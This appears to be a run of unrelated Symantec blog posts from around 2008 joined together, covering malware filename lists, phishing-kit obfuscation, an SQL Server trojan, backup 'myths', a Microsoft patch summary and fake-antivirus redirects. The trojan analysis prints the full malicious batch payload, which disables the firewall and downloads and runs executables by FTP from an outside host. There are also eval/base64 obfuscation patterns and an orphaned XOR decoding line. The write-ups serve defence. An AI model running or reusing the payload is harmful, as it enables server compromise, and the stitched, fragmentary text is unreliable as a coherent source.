av2009.exe
av2008xp.exe
AV2009Install_*.exe (e.g. AV2009Install_880401.exe)
xpa.exe
skypecomm.dll
winsrc.dll

Name: Packed.Generic.186
Description: Commonly used by Trojan.Blusod, Trojan.Fakeavalert and Downloaders.
Filenames:

InstallAntivirus_trXP.exe
lphc*.exe (e.g. lphcjooj0ecg4.exe)
mssadv_sp.exe

Name: Packed.Generic.187
Description: Used by AntiVirus2009 droppers and Downloaders.
Filenames:

A9installer_*.exe (e.g. A9installer_770522157731.exe)
MultyCodecUpgr*.exe (e.g. MultyCodecUpgr.7.20765.exe)
av2009.exe
Contract.doc.exe
Approved.doc.exe
msxml71.dll
video*.cfg.exe (e.g. video1055.cfg.exe)
video(*).cfg (e.g. video1054.cfg)

Name: Packed.Generic.188
Description: Used by Trojan.Blusod, Backdoor.Tidserv and AntiVirus2008.
Filenames:

lphc*.exe (e.g. lphcjooj0ecg4.exe)
AV2008install.exe
file.exe
.tt4.tmp
scan.exe
TDSS*.tmp
TDSS*.dll

Regardless of the spam campaign, filenames, and/or packer used, the thing that you may have noticed these days is the fact that pretty much all of these malicious emails and samples are somehow related to misleading applications. In most cases, these misleading apps end up downloading and installing an antivirus clone program or a fake security product. So, now that you know the common filenames used by the bad guys these days, watch what you click when you receive your next email!

The architecture is based on a loosely coupled interoperability model that requires products to adhere to a limited set of technology requirements in order to be considered OCA-enabled. The Symantec OCA enables products to interoperate for the purpose of data/information sharing among multiple products. This allows task and operational control of one product to be initiated by another product while creating loosely integrated process automation solutions for IT domain-specific processes, as prescribed in ITIL, for example. Working across IT domains, sharing and exchanging data, and enabling automation all contribute to greater cost effectiveness and risk management for the enterprise.

Open Collaborative Architecture is neither a product nor a solution in itself and cannot be purchased independently of the products that adopt its technologies. The idea is to prescribe an evolutionary approach to interoperability and solution construction, building on the Altiris solution model that is available today. As a common solutions and software architecture, the OCA enables various forms and multiple models for interoperability, none of which are mutually exclusive.

Using standard technologies around web services, web-based security, workflow management, and configuration management, the OCA provides greater flexibility and openness to build complex, multi-disciplinary, and multi-vendor solutions that can be tailored to meet specific business needs.

This approach has an obvious drawback: if the directory-listing feature is enabled on the web server, other Internet users (including the compromised financial institutions) would be able to read those files. The countermeasure that was adopted by the fraudsters was the usage of "drop-boxes" as shown below:



As highlighted by Andrea Del Miglio in this blog article, this way of collecting credentials is much more effective. The second generation of phishing kits I want to focus on introduced new and interesting features in order to guarantee a longer life for the attacks. Some of the features included preventing security companies from accessing the websites, which made the analysis of the deployed code much more difficult.

Because online fraud service providers usually adopt automated techniques in order to validate phishing attacks, often a fake HTTP 404 "Page Not Found" is returned in case the connection is coming from one of these security companies, as shown in the example given below. The fraudster is then notified via email when such an event occurs, allowing him or her to immediately collect all of the credentials and move the attack to a new compromised web server.

Slowing down phishing kit analysis is another objective fraudsters are trying to achieve. The sample provided in the picture below performs several iterations using the following functions in order to obfuscate the PHP source code:

eval(gzinflate(str_rot13(base64_decode('[CODE_HERE]'))))
eval(gzinflate(base64_decode('[CODE_HERE]')))

This is a similar technique that we have already noticed in web-based attacks like Neosploit, Mpack, and the recent Mebroot, where the JavaScript code is obfuscated or, in some cases, even encrypted. Phishing kit evolution does not end here. New features are constantly being developed, tested, and deployed on newly compromised web servers. Attackers are constantly proving to be fairly smart and this next generation of phishing kits is expected to spread in the wild very soon. End users who want to take extra care to protect themselves from such attacks should not trust messages coming from unknown sources and avoid visiting advertised web sites unless their origin is certain and legitimate.

Warren Buffet

The idea of risk management is in the news lately, given the turmoil in the financial markets. Working in data protection, we think long and hard about risk management. Our data protection products give an enterprise significant protection in the case of an actual disaster, man-made or otherwise. Disasters, while an important factor when considering data protection in an enterprise, are in actuality low probability/high impact events. The 2007 Symantec State of the Data Center report shows that datacenter managers know that downtime is not generally caused by a disaster.

Chief reasons for downtime

As you can see, in the data center the "tide" that goes out is often just a human error or a hardware failure. There is a lot of supporting evidence that correlates this. For instance, in a recent survey of NetBackup users, we found overwhelming evidence that restore requests are primarily due to an individual user deleting files or directories. You can't protect yourself from human error by simply relying on hosted services. Even highly reliable "storage cloud" or hosted services can experience significant outages, which can often be traced to human errors. Do an Internet search on "cloud outage" if you have doubts.

When I mull this over I come to two conclusions. First, when it comes to backup and recovery operations, you want the process to be as automated as possible. This requires a central catalog managing the process so that no one has to remember how to properly restore the data correctly. You probably need to restore data because of human error already, why introduce the possibility of more human error during restore? Secondly, when you decide on data protection architectures, both the strategies and the return on investment calculations have to factor in both the low probability/high risk events like a natural disaster, but also the high probability daily events of human error.

Image 1: The threat is scanning the local subnet looking for SQL servers and it found one on the local machine (the computer is running a test SQL server with a weak password).

Once an SQL server is located, the Trojan will run a bruteforce attack on some common weak passwords for the administrator "sa" account. Note that the threat does not try to exploit any vulnerability, it is only trying to take advantage of SQL servers that may not be properly configured. When a weak password is found, the Trojan will log into the SQL server with full administrator rights.

Image 2: The threat was able to gain access to the SQL server and is now running commands and stored procedures in administrator mode.

At this point, the threat will be able to send commands for executing some common SQL stored procedures. In particular, it will disable some security settings and will use the stored procedure sp_add_jobstep in order to run a batch script, which is the real malicious payload.

Image 3: Network capture of the malicious Query Packed, which is used to run the sp_add_jobstep procedure to inject the batch script.

Normally the xp_cmdshell stored procedure is used in these kind of attacks and it is usually recommended that this procedure is removed from the server, unless it is absolutely necessary to have it. However, the sp_add_jobstep is a less common procedure, so there may be a better chance to find it and use it on a server, even though it is a little more tricky to use. The threat will need to modify the registry value HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines\SandBoxMode in order to lower the security settings of the server and to be able to run unsafe code. The core payload is the following (a text dump of the data take in the network capture in Image 3):

exec sp_add_job 'ux';
exec sp_add_jobstep Null,'ux',Null,'1','CMDEXEC','Cmd /c Copy ias\dnary.mdb dnary.mdb&del ias\ias.mdb&del ias\dnary.mdb&Start net1 stop sharedaccess&md ZeHin&cd ZeHin&del *.* /f /s /q&Cacls %windir%\system32\ftp.exe /c /e /p EveryOne:F&echo open SuperQ.Vicp.Cc>k.x&echo new>>k.x&echo 123>>k.x&echo mget *.exe>>k.x&echo bye>>k.x&ftp -i -s:k.x&del k.x&Cacls %windir%\system32\ftp.exe /C /E /P EveryOne:N&echo for %%i in (*.exe) do start %%i>DoIt.bat&DoIt.bat&ping -n 10 127.0.0.1&DoIt.bat&del DoIt.bat';
exec sp_add_jobserver Null,'ux',Null;
exec sp_start_job 'ux';

The batch script will disable the security settings (firewall, remote access policies), and will use the system's ftp.exe program to download and run several executables from a remote host.

Image 4: The threat was able to run the batch script and open an ftp connection towards a malicious IP, from which it will download several malicious files.

Machines with a badly configured SQL server are exposed to this threat, which can attack the servers both locally or remotely. Standard good security practices are advised to tackle this risk: set a strong password for the SQL server administrator account, block access to the server from unrequired networks, and properly configure access rights for the stored procedures.

String.fromCharCode(key2 ^(key1 ^ encodedString.charCodeAt(i)

As we make our way through common data protection myths, we have talked quite a bit about how innovation has advanced data protection technologies over the last few years. In fact, until fairly recently data protection was all about backup. How fast can we backup our data? What is the success rate of backups? These were the primary concerns for IT administrators.

Now, recovery is the star of the show. It's not simply about backing up the data. The data must be recoverable-usually quickly and at the right granularity. Therefore, recovery is largely viewed as the most important aspect of data protection. If an organization cannot recover the data when they need it, what is the point of backing it up in the first place?

Here's an example. Imagine that you are a small business that relies heavily on IT functions for sales, operations, and day-to-day communication. Perhaps you run a law firm and need to produce a specific file or email for a court case. That small amount of data must be recovered. And, depending on your deadline, you need the ability to do it quickly.

As I've mentioned throughout this series, the tolerance for data loss in today's environment is minimal-even for the smallest organizations-but that low tolerance (and the speed at which it is recovered) is only part of the larger recovery equation.

The other challenge is the growing importance of granular recovery, which is the need to recover a single document, file, or piece of data. Advanced granular recovery technologies allow users to protect data with a single-pass backup but recover data at either the granular, file-level or image level. This technology is available for file systems as well as Microsoft Exchange, SharePoint, Active Directory as well as virtual environments.

The number of recovery scenarios is always becoming more complicated. If granular recovery is at one end of the spectrum, the other might be complete system recovery, otherwise known as "bare metal recovery." Integrated system recovery technologies can leverage single-pass backups for fast, yet comprehensive system recovery-even in dissimilar hardware environments.

With these new technologies-and new demands-the emphasis has shifted. Backup performance used to be the primary consideration when selecting a backup product. While backup performance is still a major factor when considering a solution, it's really all about recovery today. And, the recovery needs of organizations can vary greatly based on the organization and the scenario.

Tomorrow, we'll close out our series by debunking myths around virtual machine backups.

In Myth #2 we talked about granular recovery as a main driver for implementing disk into the backup infrastructure and a good way to help IT meet today's RPOs and RTOs. As I mentioned, granular level recovery is one technology that enables IT to meet those RTOs and RPOs. However, I didn't talk about some of the perceived challenges of granular level recovery, so I'd like to debunk the myth that it takes too long to restore data at this level.

Advanced granular recovery technology enables businesses to quickly restore individual emails, files, or documents from one backup pass, saving significant time and money. Up until now, backup and recovery procedures have been arduous, requiring multiple agents and multiple backups. For example, here is what might be required on an Exchange server:

* Full database backup - so a full recovery of the Exchange server could be performed if needed.
* Granular recovery of Exchange - via a mailbox, or "brick-level" backup. MAPI technology means this backup can take up to four times longer than a whole database backup.
* Incremental backups of the database and mailbox each night.

Subject: Security Check
From: SYMANTEC

Needless to say, this is not from Symantec. The body of the message contains text that indicates that the Symantec Security Check System has tested your computer and found "X" number of dangerous imperfections. The email goes on to say that your computer is infected with the virus "Worm@bda.267." Users are encouraged to click the provided link to download updates to protect their systems from further damage from this worm. Incidentally, there is no such virus as Worm@bda.267.

If the link is clicked, the virus will be downloaded onto the victim's computer. Spammers are using a social engineering technique by leveraging the reputation that Symantec has for antivirus. The spammers are also banking on the hope that if Symantec tells you that you have a virus and provides a link to download protection, you might just click it.

The body of the email looks like the following:

One interesting thing about this attack is the use of "recycling" by the spammers. We've seen this exact spam attack before, but not for approximately two years or so. The spam message back then was also in Portuguese and had an almost identical body to this more recent spam. In the previous attack the payload was a downloader, but it is interesting to see that spammers are recycling nearly identical messages several years apart

This is one trick that you shouldn't fall for. When receiving any emails from any reputable company, always check the headers to verify that they match the company that the message is supposedly coming from. This is especially important in the current flurry of virus emails and if you're ever in doubt, it doesn't hurt to send an email or make a phone call-check with the (supposed) sender of the message to make sure that it is legitimate.

In part three of our series on data protection myths, I thought we could take a look at the dreaded upgrade. Upgrading your data protection software is generally perceived as a painful process among the IT crowd. At the same time, that crowd is seeing the need to upgrade. Gartner research from July 2008 proved this. In a survey of 70 IT managers, 66% of respondents said they were planning major redesigns of backup and recovery systems within 12 months, according to analyst Alan Dayley. That is a lot of frustrated IT managers.

Fortunately, we think this is yet another data protection myth. While the process might seem daunting, in actuality, upgrading to the right solution will eliminate headaches in the long run. Today's data protection technology will save time and money. IT professionals are beginning to realize that outdated backup software can't handle the RTO and RPO demands of today, as well as the ever increasing amounts of data that exist in the typical organization.

What users might not realize is that newer data protection technologies leverage lifecycle management technology for the data protection infrastructure itself, which makes it much easier for IT administrators to upgrade old versions from years ago to the latest solutions. With the right infrastructure management tools, an overhaul might not be as painful as users think.

While some IT organizations prefer to keep old versions of their backup and recovery solutions, upgrading can provide significant benefits by using newer technology that will ultimately save them time and money. Also, big vendors usually have solutions optimized for a specific market segment and priced accordingly, so SMBs can reap similar benefits to an enterprise at a price point more specific to an SMB size. Customers who may be using a very old version of a product are frequently faced with the unpleasant scenario of how to get from "A" to "E." Innovative data protection solutions can virtually eliminate the pain of a very manual process. Imagine all the man-hours that could be recaptured if the process of automating the patching and upgrading of a data protection infrastructure were streamlined.

We'll be back tomorrow with Myth #4 about granular level recovery.

As always, customers are advised to follow these security best practices:

- Avoid sites of questionable or unknown integrity.
- Never open files from unknown or questionable sources.
- Run all client software with the least privileges required while still maintaining functionality.

Microsoft's summary of the September releases can be found here: http://www.microsoft.com/technet/security/bulletin/ms08-sep.mspx

1. MS08-052 Vulnerabilities in GDI+ Could Allow Remote Code Execution (954593)

CVE-2007-5348 (BID 30138) Microsoft Windows GDI+ VML Heap-Based Buffer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A remote code-execution vulnerability affects GDI+ when handling gradient sizes. An attacker must trick a victim into visiting a Web site containing malicious content, opening a malicious email, or into opening a malicious image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0

CVE-2008-3012 (BID 31019) Microsoft GDI+ EMF Image Processing Memory Corruption Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A remote code-execution vulnerability affects GDI+ when handling memory allocation. An attacker must trick a victim into visiting a Web site containing malicious content or into opening a malicious EMF image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0

CVE-2008-3013 (BID 31020) Microsoft GDI+ GIF File Parsing Remote Code Execution Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A remote code-execution vulnerability affects GDI+ when parsing indexes in specially crafted GIF image files. An attacker must trick a victim into viewing a Web site containing malicious content or into opening a malicious image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0

CVE-2008-3014 (BID 31021) Microsoft GDI+ WMF Image File Buffer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A remote code-execution vulnerability affects GDI+ when allocating memory for WMF image files. An attacker must trick a victim into viewing a Web site containing malicious content or into opening a malicious image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Internet Explorer 6, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Server 2003 with SP1 and SP2 for Itanium-based Systems, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, Windows Server 2008 for 32-bit Systems*, x64-based Systems*, and Itanium-based Systems, Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0

CVE-2008-3015 (BID 31022) Microsoft GDI+ BMP Integer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A remote code-execution vulnerability affects GDI+ when handling integer calculations. An attacker must trick a victim into viewing a Web site containing malicious content, or into opening a malicious BMP image file to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Visio 2002 SP2, Microsoft Office PowerPoint Viewer 2003, Microsoft Works 8, Microsoft Digital Image Suite 2006, SQL 2000 Reporting Services SP2, SQL Server 2005 SP2, SQL Server 2005 x64 Edition SP2, SQL Server 2005 for Itanium-based Systems SP2, Microsoft Report Viewer 2005 SP1 Redistributable Package, Microsoft Report Viewer 2008 Redistributable Package, and Microsoft Forefront Client Security 1.0

2. MS08-054 Vulnerability in Windows Media Player Could Allow Remote Code Execution (954154)

CVE-2008-2253 (BID 30550) Microsoft Windows Media Player SSPL File Sample Rate Remote Code-Execution Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A client-side remote code-execution vulnerability affects Media Player when handling streamed audio-only files from a server-side playlist (SSPL). An attacker must trick a victim into opening a malicious audio file from a Windows Media Server to exploit this issue. A successful attack will result in the execution of attacker-supplied code in the context of the currently logged-in user.

Affects: Windows Media Player 11

3. MS08-055 Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (955047)

CVE-2008-3007 (BID 31067) Microsoft Office OneNote URL Handler Remote Code Execution Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A remote code execution vulnerability affects Office when processing the OneNote protocol handler ('onenote://'). An attacker can exploit this issue by tricking a victim into following a malicious URL. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Office XP SP3, Microsoft Office 2003 SP2 and SP3, 2007 Microsoft Office System, 2007 Microsoft Office System SP1, Microsoft Office OneNote 2007 and Microsoft Office OneNote 2007 SP1

4. MS08-053 Vulnerability in Windows Media Encoder 9 Could Allow Remote Code Execution (954156)

CVE-2008-3008 (BID 31065) Microsoft Windows Media Encoder 9 'wmex.dll' ActiveX Control Remote Buffer Overflow Vulnerability (MS Rating: Critical / Symantec Urgency Rating 7.1/10)

A client-side remote-code execution vulnerability affects the WMEX.DLL ActiveX control installed by Windows Media Encoder 9. An attacker must trick a victim into viewing a Web page containing malicious content to exploit this issue. A successful attack will result in the execution of arbitrary code in the context of the currently logged-in user.

Affects: Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows XP Professional x64 Edition, Windows XP Professional x64 Edition SP2, Windows Server 2003 SP1 and SP2, Windows Server 2003 x64 Edition, Windows Server 2003 x64 Edition SP2, Windows Vista, Windows Vista SP1, Windows Vista x64 Edition, Windows Vista x64 Edition SP1, and Windows Server 2008 for 32-bit Systems**, and x64-based Systems**

• More information on this and the other vulnerabilities being addressed this month is available at Symantec's free SecurityFocus portal and to our customers through the DeepSight Threat Management System.

Late last week, we kicked off a blog post series looking at the common myths that exist around data protection technologies. I tried to convince users that scalability can be realized with the right data protection strategy, thanks to the innovative technologies that exist today.

Technological advancement with hard disks has been a tremendous driver for data protection technologies, yet some users think disk-based technologies are too complicated. We don't advocate that users replace tape entirely; in fact, there is a place for tape backups in most IT environments. However, don't shortchange yourself by overlooking today's new disk technologies. Some of them might be intimidating, but in actuality they will help administrators reduce storage capacity and IT overhead.

The most compelling driver for disk technologies might be the ability to meet recovery time objectives (RTOs) and recovery point objectives (RPOs) more easily. Even the smallest organizations must deal with the fact that the tolerance for data loss is dramatically lower than ever before.

Disk technologies provide a great platform for software manufacturers to do things that are just not possible with serial-storage media such as tape. A prime example is the ability to use a single backup set of data coupled with granular recovery technology to address today's complex recovery scenarios. Users can gain the ability to recover everything from a single document to an entire system with just one backup. Disk also powers entirely new possibilities for complete system recovery. Bare-metal recovery to dissimilar hardware environments-as well as to virtual environments-is a must-have in every IT organization's toolbox, even those without deep pockets.

Data deduplication and continuous data protection (CDP) take disk to the next level for many users. Data deduplication, which can be driven with software or hardware, looks for redundant instances of backup data at a sub-file, or block level, across all backup data.

Continuous data protection (CDP), also called continuous backup, refers to the automatic backup of data every time data on a volume, file system, or database system changes. It allows administrators (and in some cases users) to restore data to any point in time, so with today's RTOs and RPOs it makes CDP a very compelling solution. Writing a continuous stream of data demands that disk-based solutions are implemented.

A growing number of disk-based backup and recovery tools also provide online backup and restore capabilities via storage-as-a-service (SaaS) technologies. For small businesses or remote offices with limited or no IT staff on site, this service saves time and resources and eliminates the headaches associated with tape-based backup by electronically sending backups to a secure offsite location where they are safe from hardware failure, malicious code and natural disasters. "Last-mile" issues of Internet access bandwidth still plague customers of all sizes. Coupling SaaS with existing in-house data protection tools eliminates the "all-or-nothing" proposition of traditional SaaS offerings. This hybrid approach allows customers to take advantage of SaaS for protecting their most critical data from site disasters but continues to leverage the power of in-house solutions for fast recovery in all but the most disastrous situations.

The bottom line is that disk technologies can help IT managers sleep better at night. As the tolerance for data loss dramatically decreases, the role of disk is becoming more critical in any organizations data protection strategy. More data protection myths will be busted throughout the week-stay tuned.

Jason Fisher
Director of Product Management, Symantec Backup Exec

Jason Fisher
Director of Product Management, Symantec Backup Exec

• Sensationalized "fake" news headlines
• Use of seemingly real news headlines
• Purported download for the latest version of Internet Explorer
• Malware + spam + phishing = The triple security threat for financial institutions
• Airline e-ticket connects malicious code and spam

Based on the contents, the victim is invited to click on the links to get additional information, but ends up getting fake pop-up messages generated by fake Web sites hosting misleading applications. Here is an example of one such pop-up message:



When the victim clicks the OK button, a fake antivirus installer is downloaded to the victim's machine. The link on the "Microsoft Windows History" page contains a link to "hxxp://anitspy.com". This link will redirect the page to "hxxp://llab.com". If it is a user's first visit to the site, then the site will redirect that Web page to a malicious Web site (hxxp://pc.com), which serves up a misleading application. In other instances the page will be redirected to a search site called "hxxp://searcher.com," where the user will see an advertisement to download fake antivirus software. The complete scenario makes it seem as if attackers are running underground affiliate networks to promote misleading applications.

Social engineering attacks that involve victims who are tricked into clicking on malicious links are not new; however, now the attackers have started using free service sites as a new attack vector to push their misleading applications. Symantec has built excellent safe browsing features in its 2008 solutions and continues to enhance protection technologies in its upcoming 2009 product offerings. Symantec continues to detect misleading applications, including those mentioned above. We recommend that you keep your computer and Internet security products and definitions up-to-date, patch your systems, and run your Web browser with limited options enabled.